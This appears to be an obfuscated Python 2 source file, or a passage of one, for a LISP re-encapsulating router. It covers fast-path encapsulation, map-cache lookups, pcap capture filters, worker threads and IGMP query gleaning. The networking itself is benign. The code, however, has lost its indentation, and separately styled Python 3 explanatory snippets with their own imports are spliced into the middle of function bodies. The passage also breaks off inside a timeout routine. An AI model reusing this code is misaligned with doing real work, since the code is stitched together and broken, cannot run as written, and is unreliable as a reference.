if ( lisp . lisp_data_plane_logging == False ) : return
if ( sred in [ "Send" , "Receive" ] ) :
o0o = binascii . hexlify ( packet [ 0 : 20 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}" . format ( sred , o0o [ 0 : 8 ] , o0o [ 8 : 16 ] ,
o0o [ 16 : 24 ] , o0o [ 24 : 32 ] , o0o [ 32 : 40 ] ) )
elif ( sred in [ "Encap" , "Decap" ] ) :
o0o = binascii . hexlify ( packet [ 0 : 36 ] )
lisp . lprint ( "Fast-{}: ip {} {} {} {} {}, udp {} {}, lisp {} {}" . format ( sred , o0o [ 0 : 8 ] , o0o [ 8 : 16 ] , o0o [ 16 : 24 ] , o0o [ 24 : 32 ] , o0o [ 32 : 40 ] ,
o0o [ 40 : 48 ] , o0o [ 48 : 56 ] , o0o [ 56 : 64 ] , o0o [ 64 : 72 ] ) )
def ii ( dest , mc ) :
if ( lisp . lisp_data_plane_logging == False ) : return
I11iiii = "miss" if mc == None else "hit!"
lisp . lprint ( "Fast-Lookup {} {}" . format ( dest . print_address ( ) , I11iiii ) )
def o0O ( ts , msg ) :
global I1I11I1I1I
if ( I1I11I1I1I == False ) : return ( None )
if ( ts == None ) : return ( time . time ( ) )
ts = ( time . time ( ) - ts ) * 1000000
lisp . lprint ( "{}-Latency: {} usecs" . format ( msg , round ( ts , 1 ) ) , "force" )
return ( None )
def I1IiIiiIiIII ( a ) :
iIIi = ord ( a [ 0 ] ) << 24 | ord ( a [ 1 ] ) << 16 | ord ( a [ 2 ] ) << 8 | ord ( a [ 3 ] )
return ( iIIi )
iiI1I1 = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
ooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
def I1Iii1 ( packet ) :
global lisp_map_cache , OOo
Ooo00O0o = o0O ( None , "Fast" )
I111i1i1111 = 0
IIII1 = None
if ( packet [ 9 ] == '\x11' ) :
if ( packet [ 20 : 22 ] == '\x10\xf6' ) : return ( False )
if ( packet [ 22 : 24 ] == '\x10\xf6' ) : return ( False )
if ( packet [ 20 : 22 ] == '\x10\xf5' or packet [ 22 : 24 ] == '\x10\xf5' ) :
IIII1 = packet [ 12 : 16 ]
I111i1i1111 = packet [ 32 : 35 ]
I111i1i1111 = ord ( I111i1i1111 [ 0 ] ) << 16 | ord ( I111i1i1111 [ 1 ] ) << 8 | ord ( I111i1i1111 [ 2 ] )
if ( I111i1i1111 == 0xffffff ) : return ( False )
o00Oo0oooooo ( "Decap" , packet )
packet = packet [ 36 : : ]
o00Oo0oooooo ( "Receive" , packet )
ii1 = I1IiIiiIiIII ( packet [ 16 : 20 ] )
ooO . instance_id = I111i1i1111
ooO . address = ii1
if ( ( ii1 & 0xe0000000 ) == 0xe0000000 ) : return ( False )
ii1 = ooO
O00o0OO0000oo = lisp . lisp_map_cache . lookup_cache ( ii1 , False )
ii ( ii1 , O00o0OO0000oo )
if ( O00o0OO0000oo == None ) : return ( False )
if ( IIII1 != None ) :
I11ii1i1 = I1IiIiiIiIII ( packet [ 12 : 16 ] )
iiI1I1 . instance_id = I111i1i1111
iiI1I1 . address = I11ii1i1
ooo0OoOOOOO = lisp . lisp_map_cache . lookup_cache ( iiI1I1 , False )
if ( ooo0OoOOOOO == None ) :
i1iIi1iI , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( iiI1I1 , None ,
None )
if ( i1iIi1iI ) : return ( False )
elif ( ooo0OoOOOOO . gleaned ) :
IIII1 = I1IiIiiIiIII ( IIII1 )
if ( ooo0OoOOOOO . rloc_set [ 0 ] . rloc . address != IIII1 ) : return ( False )
O00o0OO0000oo . add_recent_source ( iiI1I1 )
if ( O00o0OO0000oo . action == lisp . LISP_NATIVE_FORWARD_ACTION and
O00o0OO0000oo . eid . instance_id == 0 ) :
ii1 . instance_id = lisp . lisp_default_secondary_iid
O00o0OO0000oo = lisp . lisp_map_cache . lookup_cache ( ii1 , False )
ii ( ii1 , O00o0OO0000oo )
if ( O00o0OO0000oo == None ) : return ( False )
if ( O00o0OO0000oo . action != lisp . LISP_NATIVE_FORWARD_ACTION ) :
if ( O00o0OO0000oo . best_rloc_set == [ ] ) : return ( False )
ii1 = O00o0OO0000oo . best_rloc_set [ 0 ]
if ( ii1 . state != lisp . LISP_RLOC_UP_STATE ) : return ( False )
I111i1i1111 = O00o0OO0000oo . eid . instance_id
OoOO = ii1 . translated_port
Oooo00 = ii1 . stats
ii1 = ii1 . rloc
I111iIi1 = ii1 . address
IIII1 = lisp . lisp_myrlocs [ 0 ] . address
o00 = '\x45\x00'
oO = len ( packet ) + 20 + 8 + 8
o00 += chr ( ( oO >> 8 ) & 0xff ) + chr ( oO & 0xff )
o00 += '\xff\xff\x40\x00\x10\x11\x00\x00'
o00 += chr ( ( IIII1 >> 24 ) & 0xff )
o00 += chr ( ( IIII1 >> 16 ) & 0xff )
o00 += chr ( ( IIII1 >> 8 ) & 0xff )
o00 += chr ( IIII1 & 0xff )
o00 += chr ( ( I111iIi1 >> 24 ) & 0xff )
o00 += chr ( ( I111iIi1 >> 16 ) & 0xff )
o00 += chr ( ( I111iIi1 >> 8 ) & 0xff )
o00 += chr ( I111iIi1 & 0xff )
o00 = lisp . lisp_ip_checksum ( o00 )
Ooooooo = oO - 20
I1IIIiI1I1ii1 = '\xff\x00' if ( OoOO == 4341 ) else '\x10\xf5'
I1IIIiI1I1ii1 += chr ( ( OoOO >> 8 ) & 0xff ) + chr ( OoOO & 0xff )
I1IIIiI1I1ii1 += chr ( ( Ooooooo >> 8 ) & 0xff ) + chr ( Ooooooo & 0xff ) + '\x00\x00'
I1IIIiI1I1ii1 += '\x08\xdf\xdf\xdf'
I1IIIiI1I1ii1 += chr ( ( I111i1i1111 >> 16 ) & 0xff )
I1IIIiI1I1ii1 += chr ( ( I111i1i1111 >> 8 ) & 0xff )
I1IIIiI1I1ii1 += chr ( I111i1i1111 & 0xff )
I1IIIiI1I1ii1 += '\x00'
packet = o00 + I1IIIiI1I1ii1 + packet
o00Oo0oooooo ( "Encap" , packet )
else :
oO = len ( packet )
Oooo00 = O00o0OO0000oo . stats
o00Oo0oooooo ( "Send" , packet )
O00o0OO0000oo . last_refresh_time = time . time ( )
Oooo00 . increment ( oO )
ii1 = ii1 . print_address_no_iid ( )
OOo . sendto ( packet , ( ii1 , 0 ) )
o0O ( Ooo00O0o , "Fast" )
return ( True )
def IIIii ( lisp_packet , thread_name ) :
global II1iII1i , O00OooOo00o , IiI11i1IIiiI
global OOo , Ii1IIii11
global oO0oIIII
global iIiiI1
global oo0Ooo0
Ooo00O0o = o0O ( None , "RTR" )
if ( oo0Ooo0 ) :
if ( I1Iii1 ( lisp_packet . packet ) ) : return
Ooooo00o0OoO = lisp_packet
oooo0O0O0o0 = Ooooo00o0OoO . is_lisp_packet ( Ooooo00o0OoO . packet )
if ( oooo0O0O0o0 == False ) :
oOoOOo0oo0 = Ooooo00o0OoO . packet
o0O0Oo00Oo0o , OOOo , OoOO , oo0OOo0O = lisp . lisp_is_rloc_probe ( oOoOOo0oo0 , - 1 )
if ( oOoOOo0oo0 != o0O0Oo00Oo0o ) :
if ( OOOo == None ) : return
lisp . lisp_parse_packet ( II1iII1i , o0O0Oo00Oo0o , OOOo , OoOO , oo0OOo0O )
return
Ooooo00o0OoO . packet = lisp . lisp_reassemble ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
if ( lisp . lisp_flow_logging ) : Ooooo00o0OoO = copy . deepcopy ( Ooooo00o0OoO )
if ( oooo0O0O0o0 ) :
if ( Ooooo00o0OoO . decode ( True , None , lisp . lisp_decap_stats ) == None ) : return
Ooooo00o0OoO . print_packet ( "Receive-({})" . format ( thread_name ) , True )
Ooooo00o0OoO . strip_outer_headers ( )
else :
if ( Ooooo00o0OoO . decode ( False , None , None ) == None ) : return
Ooooo00o0OoO . print_packet ( "Receive-({})" . format ( thread_name ) , False )
if ( oooo0O0O0o0 and Ooooo00o0OoO . lisp_header . get_instance_id ( ) == 0xffffff ) :
II1I1iiIII1I1 = lisp . lisp_control_header ( )
II1I1iiIII1I1 . decode ( Ooooo00o0OoO . packet )
if ( II1I1iiIII1I1 . is_info_request ( ) ) :
o0Ooo0o0ooo0 = lisp . lisp_info ( )
o0Ooo0o0ooo0 . decode ( Ooooo00o0OoO . packet )
o0Ooo0o0ooo0 . print_info ( )
ooo = o0Ooo0o0ooo0 . hostname if ( o0Ooo0o0ooo0 . hostname != None ) else ""
OOOO0oooo = Ooooo00o0OoO . outer_source
o0o = Ooooo00o0OoO . udp_sport
if ( lisp . lisp_store_nat_info ( ooo , OOOO0oooo , o0o ) ) :
o00oo0 ( II1iII1i , ooo , OOOO0oooo , o0o )
else :
OOOo = Ooooo00o0OoO . outer_source . print_address_no_iid ( )
oo0OOo0O = Ooooo00o0OoO . outer_ttl
Ooooo00o0OoO = Ooooo00o0OoO . packet
if ( lisp . lisp_is_rloc_probe_request ( Ooooo00o0OoO [ 28 ] ) == False and
lisp . lisp_is_rloc_probe_reply ( Ooooo00o0OoO [ 28 ] ) == False ) : oo0OOo0O = - 1
Ooooo00o0OoO = Ooooo00o0OoO [ 28 : : ]
lisp . lisp_parse_packet ( II1iII1i , Ooooo00o0OoO , OOOo , 0 , oo0OOo0O )
return
if ( lisp . lisp_ipc_data_plane ) :
lisp . dprint ( "Drop packet, external data-plane active" )
return
if ( oooo0O0O0o0 ) :
lisp . lisp_decap_stats [ "good-packets" ] . increment ( len ( Ooooo00o0OoO . packet ) )
I1i11II = None
if ( Ooooo00o0OoO . inner_dest . is_mac ( ) ) :
Ooooo00o0OoO . packet = lisp . lisp_mac_input ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . encap_port = lisp . LISP_VXLAN_DATA_PORT
elif ( Ooooo00o0OoO . inner_version == 4 ) :
I1i11II , Ooooo00o0OoO . packet = lisp . lisp_ipv4_input ( Ooooo00o0OoO . packet )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . inner_ttl = Ooooo00o0OoO . outer_ttl
elif ( Ooooo00o0OoO . inner_version == 6 ) :
Ooooo00o0OoO . packet = lisp . lisp_ipv6_input ( Ooooo00o0OoO )
if ( Ooooo00o0OoO . packet == None ) : return
Ooooo00o0OoO . inner_ttl = Ooooo00o0OoO . outer_ttl
else :
lisp . dprint ( "Cannot parse inner packet header" )
return
if ( Ooooo00o0OoO . is_trace ( ) ) :
if ( lisp . lisp_trace_append ( Ooooo00o0OoO , ed = "decap" ) == False ) : return
Ooooo00o0OoO . outer_source . afi = lisp . LISP_AFI_NONE
Ooooo00o0OoO . outer_dest . afi = lisp . LISP_AFI_NONE
i1iIi1iI , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( Ooooo00o0OoO . inner_source , None ,
Ooooo00o0OoO . outer_source )
if ( i1iIi1iI ) :
Ooo = Ooooo00o0OoO . packet if ( I1i11II ) else None
lisp . lisp_glean_map_cache ( Ooooo00o0OoO . inner_source , Ooooo00o0OoO . outer_source ,
Ooooo00o0OoO . udp_sport , Ooo )
if ( I1i11II ) : return
oOO00O = Ooooo00o0OoO . inner_dest
if ( oOO00O . is_multicast_address ( ) ) :
if ( oOO00O . is_link_local_multicast ( ) ) :
ooo0OO = lisp . green ( oOO00O . print_address ( ) , False )
lisp . dprint ( "Drop link-local multicast EID {}" . format ( ooo0OO ) )
return
oOoOoO000OO = False
i1I11IiI1iiII , o00oOo0oOoo , ii11II11 = lisp . lisp_allow_gleaning ( Ooooo00o0OoO . inner_source , oOO00O , None )
else :
oOoOoO000OO , i1I11IiI1iiII , o00oOo0oOoo = lisp . lisp_allow_gleaning ( oOO00O , None , None )
if 70 - 70: iIii1I11I1II1
Ooooo00o0OoO . gleaned_dest = oOoOoO000OO
# Map-cache lookup for the inner flow.
O00o0OO0000oo = lisp.lisp_map_cache_lookup(Ooooo00o0OoO.inner_source, Ooooo00o0OoO.inner_dest)
if O00o0OO0000oo: O00o0OO0000oo.add_recent_source(Ooooo00o0OoO.inner_source)
# On a native-forward or default entry, retry the lookup in the source
# database's secondary instance-ID, gleaning if that also misses.
if O00o0OO0000oo and (O00o0OO0000oo.action == lisp.LISP_NATIVE_FORWARD_ACTION or O00o0OO0000oo.eid.address == 0):
O0O00OOo = lisp.lisp_db_for_lookups.lookup_cache(Ooooo00o0OoO.inner_source, False)
if O0O00OOo and O0O00OOo.secondary_iid:
OoOOo = Ooooo00o0OoO.inner_dest
OoOOo.instance_id = O0O00OOo.secondary_iid
O00o0OO0000oo = lisp.lisp_map_cache_lookup(Ooooo00o0OoO.inner_source, OoOOo)
if O00o0OO0000oo:
Ooooo00o0OoO.gleaned_dest = O00o0OO0000oo.gleaned
O00o0OO0000oo.add_recent_source(Ooooo00o0OoO.inner_source)
else:
oOoOoO000OO, i1I11IiI1iiII, o00oOo0oOoo = lisp.lisp_allow_gleaning(OoOOo, None, None)
Ooooo00o0OoO.gleaned_dest = oOoOoO000OO
# A gleanable destination with no map-cache entry will show up by gleaning;
# suppress the Map-Request.
if O00o0OO0000oo is None and oOoOoO000OO:
lisp.lprint("Suppress Map-Request for gleaned EID {}".format(lisp.green(Ooooo00o0OoO.inner_dest.print_address(), False)))
return
# Map-cache miss (or send-map-request action): rate-limit and send a
# Map-Request, record the miss in the trace, and drop the packet for now.
if O00o0OO0000oo is None or O00o0OO0000oo.action == lisp.LISP_SEND_MAP_REQUEST_ACTION:
if lisp.lisp_rate_limit_map_request(Ooooo00o0OoO.inner_dest): return
lisp.lisp_send_map_request(II1iII1i, iiI1iIiI, Ooooo00o0OoO.inner_source, Ooooo00o0OoO.inner_dest, None)
if Ooooo00o0OoO.is_trace():
OOOO0oooo = oO0oIIII
O00ooOo = "map-cache miss"
lisp.lisp_trace_append(Ooooo00o0OoO, reason=O00ooOo, lisp_socket=OOOO0oooo)
return
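# A minimal sketch of the rate-limiting idea used before sending a
# Map-Request: allow at most one request per destination per interval.
# The interval and the module-level dictionary are illustrative, not the
# lispers.net implementation.
import time

_last_request = {}

def rate_limit_map_request(dest, interval=10.0):
    now = time.time()
    last = _last_request.get(dest)
    if last is not None and (now - last) < interval:
        return True   # suppress: too soon since the last request
    _last_request[dest] = now
    return False      # allow the Map-Request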
# Entry due for refresh: re-send a Map-Request (rate-limited). Then stamp
# the refresh time and count the packet against the entry.
if O00o0OO0000oo and O00o0OO0000oo.refresh():
if lisp.lisp_rate_limit_map_request(Ooooo00o0OoO.inner_dest) == False:
lisp.lprint("Refresh map-cache entry {}".format(lisp.green(O00o0OO0000oo.print_eid_tuple(), False)))
lisp.lisp_send_map_request(II1iII1i, iiI1iIiI, Ooooo00o0OoO.inner_source, Ooooo00o0OoO.inner_dest, None)
O00o0OO0000oo.last_refresh_time = time.time()
O00o0OO0000oo.stats.increment(len(Ooooo00o0OoO.packet))
# Pick an RLOC (or an RLE for multicast replication) for the destination.
OOooo00, i1oO, iI, Ii1IIi, i111i11I1ii, o00oO0oOo00 = O00o0OO0000oo.select_rloc(Ooooo00o0OoO, None)
# No usable RLOC: either forward natively (destination is not an EID) or
# drop because no reachable RLOCs exist; both outcomes are traced.
if OOooo00 is None and i111i11I1ii is None:
if Ii1IIi == lisp.LISP_NATIVE_FORWARD_ACTION:
lisp.dprint("Natively forwarding")
Ooooo00o0OoO.send_packet(OOo, Ooooo00o0OoO.inner_dest)
if Ooooo00o0OoO.is_trace():
OOOO0oooo = oO0oIIII
O00ooOo = "not an EID"
lisp.lisp_trace_append(Ooooo00o0OoO, reason=O00ooOo, lisp_socket=OOOO0oooo)
o0O(Ooo00O0o, "RTR")
return
O00ooOo = "No reachable RLOCs found"
lisp.dprint(O00ooOo)
if Ooooo00o0OoO.is_trace():
OOOO0oooo = oO0oIIII
lisp.lisp_trace_append(Ooooo00o0OoO, reason=O00ooOo, lisp_socket=OOOO0oooo)
return
# A null RLOC encodes a drop action.
if OOooo00 and OOooo00.is_null():
lisp.dprint("Drop action RLOC found")
if Ooooo00o0OoO.is_trace():
OOOO0oooo = oO0oIIII
O00ooOo = "drop action"
lisp.lisp_trace_append(Ooooo00o0OoO, reason=O00ooOo, lisp_socket=OOOO0oooo)
return
# Copy inner QoS and TTL into the new outer header.
Ooooo00o0OoO.outer_tos = Ooooo00o0OoO.inner_tos
Ooooo00o0OoO.outer_ttl = Ooooo00o0OoO.inner_ttl
# Unicast path: set the encapsulation port and outer addresses, append to
# the trace, encode, and send on the raw socket matching the outer version.
if OOooo00:
Ooooo00o0OoO.encap_port = i1oO
if i1oO == 0: Ooooo00o0OoO.encap_port = lisp.LISP_DATA_PORT
Ooooo00o0OoO.outer_dest.copy_address(OOooo00)
O0oOOo0o = Ooooo00o0OoO.outer_dest.afi_to_version()
Ooooo00o0OoO.outer_version = O0oOOo0o
i1i1IiIiIi1Ii = iIiiI1 if O0oOOo0o == 4 else lisp.lisp_myrlocs[1]
Ooooo00o0OoO.outer_source.copy_address(i1i1IiIiIi1Ii)
if Ooooo00o0OoO.is_trace():
OOOO0oooo = oO0oIIII
if lisp.lisp_trace_append(Ooooo00o0OoO, rloc_entry=o00oO0oOo00, lisp_socket=OOOO0oooo) == False: return
if Ooooo00o0OoO.encode(iI) is None: return
if len(Ooooo00o0OoO.packet) <= 1500: Ooooo00o0OoO.print_packet("Send", True)
iIIIIiiIii = Ii1IIii11 if O0oOOo0o == 6 else OOo
Ooooo00o0OoO.send_packet(iIIIIiiIii, Ooooo00o0OoO.outer_dest)
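# Sketch of the framing the encode() call performs. The real method also
# builds the LISP data header (flags, nonce, instance-ID) and the outer IP
# header; this shows only the UDP wrap toward the LISP data port. udp_wrap
# is a hypothetical helper, not part of the lispers.net API.
import struct

LISP_DATA_PORT = 4341

def udp_wrap(inner_packet, sport):
    length = 8 + len(inner_packet)
    # UDP header: source port, dest port, length, checksum (0 = unused).
    header = struct.pack(">HHHH", sport, LISP_DATA_PORT, length, 0)
    return header + inner_packet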
# Multicast path: replicate the packet to every RLE node, re-encapsulating
# per node.
elif i111i11I1ii:
ooOooOoOoO = len(Ooooo00o0OoO.packet)
for ooOOooo0Oo in i111i11I1ii.rle_forwarding_list:
Ooooo00o0OoO.outer_dest.copy_address(ooOOooo0Oo.address)
Ooooo00o0OoO.encap_port = lisp.LISP_DATA_PORT if ooOOooo0Oo.translated_port == 0 else ooOOooo0Oo.translated_port
O0oOOo0o = Ooooo00o0OoO.outer_dest.afi_to_version()
Ooooo00o0OoO.outer_version = O0oOOo0o
i1i1IiIiIi1Ii = iIiiI1 if O0oOOo0o == 4 else lisp.lisp_myrlocs[1]
Ooooo00o0OoO.outer_source.copy_address(i1i1IiIiIi1Ii)
if Ooooo00o0OoO.is_trace():
OOOO0oooo = oO0oIIII
O00ooOo = "replicate"
if lisp.lisp_trace_append(Ooooo00o0OoO, reason=O00ooOo, lisp_socket=OOOO0oooo) == False: return
if Ooooo00o0OoO.encode(None) is None: return
Ooooo00o0OoO.print_packet("Replicate-to-L{}".format(ooOOooo0Oo.level), True)
Ooooo00o0OoO.send_packet(OOo, Ooooo00o0OoO.outer_dest)
# Strip the just-prepended outer headers so the next replica starts from
# the same inner packet.
OO00OO0o0 = len(Ooooo00o0OoO.packet) - ooOooOoOoO
Ooooo00o0OoO.packet = Ooooo00o0OoO.packet[OO00OO0o0::]
if lisp.lisp_flow_logging: Ooooo00o0OoO = copy.deepcopy(Ooooo00o0OoO)
del Ooooo00o0OoO
o0O(Ooo00O0o, "RTR")
return
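# A self-contained model of the slice arithmetic in the replication loop:
# encapsulation prepends outer headers, the send happens, and the slice
# strips them again for the next RLE node. Byte strings are illustrative.
inner = b"inner-packet"
encapsulated = b"OUTERHDRS" + inner          # what encode() effectively does
prepended = len(encapsulated) - len(inner)   # bytes added by encapsulation
restored = encapsulated[prepended:]          # strip them for the next copy
assert restored == inner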
# Worker thread: pull raw packets off this thread's queue and run them
# through the decap/forward path above.
def I1I1iII1i(lisp_thread):
lisp.lisp_set_exception()
while True:
Ooooo00o0OoO = lisp_thread.input_queue.get()
lisp_thread.input_stats.increment(len(Ooooo00o0OoO))
lisp_thread.lisp_packet.packet = Ooooo00o0OoO
IIIii(lisp_thread.lisp_packet, lisp_thread.thread_name)
return
# Decide whether this pcap thread should process the current packet: the
# wall clock, modulo the pcap thread count, selects exactly one thread at
# any instant.
def o00Ooo0(thread):
O0O00O = time.time() % thread.number_of_pcap_threads
return int(O0O00O) == thread.thread_number
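# The selector above effectively time-slices capture work across pcap
# threads in one-second buckets. A quick way to observe the behavior
# (thread count of 2 assumed for illustration):
import time

def chosen_thread(num_threads):
    return int(time.time() % num_threads)

print(chosen_thread(2))  # alternates between 0 and 1 as the seconds tick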
# pcap callback: strip the datalink header, then either hand the packet to
# a worker thread (round-robin by packet count) or process it inline.
def Oo(parms, not_used, packet):
if o00Ooo0(parms[1]) == False: return
I1Iii1I = parms[0]
iIi11I = parms[1]
O0Oo = iIi11I.number_of_worker_threads
iIi11I.input_stats.increment(len(packet))
# Datalink header length: 4-byte null header on loopback, 14-byte Ethernet
# on macOS, 16-byte Linux cooked-capture header on the "any" device.
o0ooO0OOO = 4 if I1Iii1I == "lo0" else (14 if lisp.lisp_is_macos() else 16)
packet = packet[o0ooO0OOO::]
if O0Oo:
oo0 = iIi11I.input_stats.packet_count % O0Oo
oo0 = oo0 + (len(I11) - O0Oo)
i1iIIi1II1iiI = I11[oo0]
i1iIIi1II1iiI.input_queue.put(packet)
else:
iIi11I.lisp_packet.packet = packet
IIIii(iIi11I.lisp_packet, iIi11I.thread_name)
return
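# Worker selection above maps a running packet count onto the worker slice
# of the shared thread list (pcap threads occupy the front of the list,
# workers the back). A self-contained model of that indexing:
threads = ["pcap-0", "pcap-1", "worker-0", "worker-1", "worker-2"]
num_workers = 3

def pick_worker(packet_count):
    index = packet_count % num_workers
    return threads[index + (len(threads) - num_workers)]

assert [pick_worker(n) for n in range(4)] == ["worker-0", "worker-1", "worker-2", "worker-0"]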
# pcap thread: open a live capture and build the BPF filter that selects
# LISP data (4341), VXLAN (8472/4789), UDP fragments, and RLOC-probe
# control traffic.
def i1i1IiIi1(lisp_thread):
lisp.lisp_set_exception()
if lisp.lisp_myrlocs[0] is None: return
I1Iii1I = "lo0" if lisp.lisp_is_macos() else "any"
o0Oo00OO0 = pcappy.open_live(I1Iii1I, 9000, 0, 100)
# Is this RTR also doing lisp-nat? An indented match means the clause is
# active inside an interface stanza; if so, capture all routable packets.
OoOoO0O = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
OoOoO0O = (OoOoO0O != "" and OoOoO0O[0] == " ")
o00IiI1iiII1i1i = "(dst host "
i1IiI = ""
for oO00OOoO00 in lisp.lisp_get_all_addresses():
o00IiI1iiII1i1i += "{} or ".format(oO00OOoO00)
i1IiI += "{} or ".format(oO00OOoO00)
o00IiI1iiII1i1i = o00IiI1iiII1i1i[0:-4]
o00IiI1iiII1i1i += ") and ((udp dst port 4341 or 8472 or 4789) or "
o00IiI1iiII1i1i += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + "(ip[6]&0xe0 == 0 and ip[7] != 0))))"
i1IiI = i1IiI[0:-4]
o00IiI1iiII1i1i += (" or (not (src host {}) and " + "((udp src port 4342 and ip[28] == 0x28) or " + "(udp dst port 4342 and ip[28] == 0x12)))").format(i1IiI)
if OoOoO0O:
o00IiI1iiII1i1i += (" or (dst net 0.0.0.0/0 and " + "not (host {} or src net 127.0.0.0/8))").format(i1IiI)
lisp.lprint("Capturing packets for: '{}'".format(o00IiI1iiII1i1i))
o0Oo00OO0.filter = o00IiI1iiII1i1i
o0Oo00OO0.loop(-1, Oo, [I1Iii1I, lisp_thread])
return
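# Illustrative only: with a single local RLOC of 10.0.0.1 and lisp-nat
# disabled, the concatenation above yields a BPF expression equivalent to
# the string below. ip[28] is the first LISP control byte: 0x12 looks like
# a Map-Request and 0x28 a Map-Reply with the probe bit set, so the tail
# matches RLOC-probes not sourced by this host.
bpf = (
    "(dst host 10.0.0.1) and ((udp dst port 4341 or 8472 or 4789) or "
    "(proto 17 and (ip[6]&0xe0 == 0x20 or (ip[6]&0xe0 == 0 and ip[7] != 0))))"
    " or (not (src host 10.0.0.1) and "
    "((udp src port 4342 and ip[28] == 0x28) or "
    "(udp dst port 4342 and ip[28] == 0x12)))"
)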
# Data-encapsulate an IGMP query to a gleaned EID whose RLOC and translated
# port were learned from its own encapsulated traffic (it may be behind a
# NAT).
def O0OOO0(lisp_raw_socket, eid, geid, igmp):
Ooooo00o0OoO = lisp.lisp_packet(igmp)
# Find the RLE node for this EID to get its RLOC and translated port.
O00o0OO0000oo = lisp.lisp_map_cache_lookup(eid, geid)
if O00o0OO0000oo is None: return
if O00o0OO0000oo.rloc_set == []: return
if O00o0OO0000oo.rloc_set[0].rle is None: return
oO00o = eid.print_address_no_iid()
for oO0oOo0 in O00o0OO0000oo.rloc_set[0].rle.rle_nodes:
if oO0oOo0.rloc_name == oO00o:
Ooooo00o0OoO.outer_dest.copy_address(oO0oOo0.address)
Ooooo00o0OoO.encap_port = oO0oOo0.translated_port
break
if Ooooo00o0OoO.outer_dest.is_null(): return
Ooooo00o0OoO.outer_source.copy_address(lisp.lisp_myrlocs[0])
Ooooo00o0OoO.outer_version = Ooooo00o0OoO.outer_dest.afi_to_version()
Ooooo00o0OoO.outer_ttl = 32
Ooooo00o0OoO.inner_source.copy_address(lisp.lisp_myrlocs[0])
Ooooo00o0OoO.inner_dest.store_address("[{}]224.0.0.1".format(geid.instance_id))
Ooooo00o0OoO.inner_ttl = 1
iiI111I1iIiI = lisp.green(eid.print_address(), False)
O00ooOo = lisp.red("{}:{}".format(Ooooo00o0OoO.outer_dest.print_address_no_iid(), Ooooo00o0OoO.encap_port), False)
ii11i = lisp.bold("IGMP Query", False)
lisp.lprint("Data encapsulate {} to gleaned EID {}, RLOC {}".format(ii11i, iiI111I1iIiI, O00ooOo))
if Ooooo00o0OoO.encode(None) is None: return
Ooooo00o0OoO.print_packet("Send", True)
Ooooo00o0OoO.send_packet(lisp_raw_socket, Ooooo00o0OoO.outer_dest)
# Build a general IGMP membership query to 224.0.0.1 and data-encapsulate
# it for every gleaned group membership that has igmp-query gleaning
# enabled. Byte strings are Python 2 style, matching the rest of the file.
def IIi1ii1(lisp_raw_socket):
if lisp.lisp_gleaned_groups == {}: return
# IPv4 header: version/IHL 0x46 (24-byte header including the Router Alert
# option), TOS 0xc0, total length 36, DF set, TTL 1, protocol 2 (IGMP).
iiiii11I1 = "\x46\xc0\x00\x24\x00\x00\x40\x00\x01\x02\x00\x00"
Ii1 = lisp.lisp_myrlocs[0]
iII1 = Ii1.address
iiiii11I1 += chr((iII1 >> 24) & 0xff)
iiiii11I1 += chr((iII1 >> 16) & 0xff)
iiiii11I1 += chr((iII1 >> 8) & 0xff)
iiiii11I1 += chr(iII1 & 0xff)
iiiii11I1 += "\xe0\x00\x00\x01"
iiiii11I1 += "\x94\x04\x00\x00"
iiiii11I1 = lisp.lisp_ip_checksum(iiiii11I1, 24)
# IGMPv3 general query: type 0x11, max-response code 0x64 (10 seconds),
# group 0.0.0.0, QRV 2, QQIC 60 seconds, no sources.
I1i11II = "\x11\x64\x00\x00" + "\x00\x00\x00\x00" + "\x02\x3c\x00\x00"
I1i11II = lisp.lisp_igmp_checksum(I1i11II)
o0oOO000oO0oo = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
i1 = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
for Ii1iIiII1ii1 in lisp.lisp_gleaned_groups:
o0oOO000oO0oo.store_address(Ii1iIiII1ii1)
for iI1ii11Ii in lisp.lisp_gleaned_groups[Ii1iIiII1ii1]:
i1.store_address(iI1ii11Ii)
i1I11IiI1iiII, o00oOo0oOoo, O0OO0OO = lisp.lisp_allow_gleaning(o0oOO000oO0oo, i1, None)
if O0OO0OO == False: continue
O0OOO0(lisp_raw_socket, o0oOO000oO0oo, i1, iiiii11I1 + I1i11II)
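# The hand-built byte strings above predate struct usage; an equivalent
# and arguably clearer construction of the same 24-byte IPv4 header might
# look like this. build_igmp_query_ip_header is a hypothetical helper, and
# the checksum would still be filled in by the module's own
# lisp_ip_checksum().
import struct

def build_igmp_query_ip_header(src_ip_int):
    # IHL 6 (24 bytes, includes the 4-byte Router Alert option), length 36,
    # DF, TTL 1, protocol 2 (IGMP), destination 224.0.0.1, checksum 0.
    return (struct.pack(">BBHHHBBH", 0x46, 0xc0, 36, 0, 0x4000, 1, 2, 0)
            + struct.pack(">I", src_ip_int)
            + struct.pack(">I", 0xe0000001)
            + struct.pack(">I", 0x94040000))  # Router Alert option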
# Age out gleaned multicast state: entries not refreshed by an IGMP report
# within LISP_IGMP_TIMEOUT_INTERVAL are removed.
def O0O0oo():
o0oOO000oO0oo = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
i1 = lisp.lisp_address(lisp.LISP_AFI_IPV4, "", 32, 0)
OOo000OO000 = []
for Ii1iIiII1ii1 in lisp.lisp_gleaned_groups:
for iI1ii11Ii in lisp.lisp_gleaned_groups[Ii1iIiII1ii1]:
OOOO00OooO = lisp.lisp_gleaned_groups[Ii1iIiII1ii1][iI1ii11Ii]
OOO = time.time() - OOOO00OooO
if OOO < lisp.LISP_IGMP_TIMEOUT_INTERVAL: continue
OOo000OO000.append([Ii1iIiII1ii1, iI1ii11Ii])
# Remove after iterating so the dictionary is not mutated mid-loop.
ooooO0 = lisp.bold("timed out", False)
for Ii1iIiII1ii1, iI1ii11Ii in OOo000OO000:
o0oOO000oO0oo.store_address(Ii1iIiII1ii1)
i1.store_address(iI1ii11Ii)
